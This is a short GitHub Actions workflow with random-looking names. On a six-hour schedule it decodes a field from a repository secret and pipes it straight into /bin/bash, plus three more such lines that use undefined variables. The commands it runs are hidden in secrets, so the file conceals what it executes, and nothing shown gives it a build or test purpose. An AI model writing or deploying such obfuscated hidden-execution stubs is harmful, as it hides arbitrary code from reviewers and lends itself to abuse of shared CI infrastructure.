name: mingyulu1837

on:
  workflow_dispatch:
  schedule:
    - cron: '24 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: mingyulu1837
        env:
          i29878: ${{ secrets.i29878 }}
        run: |
          echo $i29878 | jq -r .yba487 | /bin/bash
          echo $pugk97 | jq -r .z31 | /bin/bash
          echo $wqmx541 | jq -r .gon2 | /bin/bash
          echo $q39 | jq -r .mh727 | /bin/bash

